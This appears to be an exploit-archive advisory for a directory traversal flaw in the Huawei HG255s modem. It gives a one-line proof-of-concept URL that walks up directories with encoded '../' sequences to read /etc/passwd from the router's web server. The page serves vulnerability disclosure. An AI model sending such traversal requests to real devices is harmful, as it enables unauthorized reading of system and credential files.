Huawei HG255s Directory Traversal

2017.09.08

Credit: Ahmet Mersin

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-22

# Exploit Title: [Server Directory Traversal at Huawei HG255s]
# Date: [07.09.2017]
# Exploit Author: [Ahmet Mersin]
# Vendor Homepage: [www.huawei.com]
# Software Link: [Not published this modem just used by Turkey]
# Version: [V100R001C163B025SP02]
#POC:
https://www.youtube.com/watch?v=n02toTFkLOU&feature=youtu.be
http://192.168.1.1/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
#You want to follow my activity ?
https://www.linkedin.com/in/ahmet-mersin-177398b0/
@gaissecurity

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Huawei HG255s Directory Traversal

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.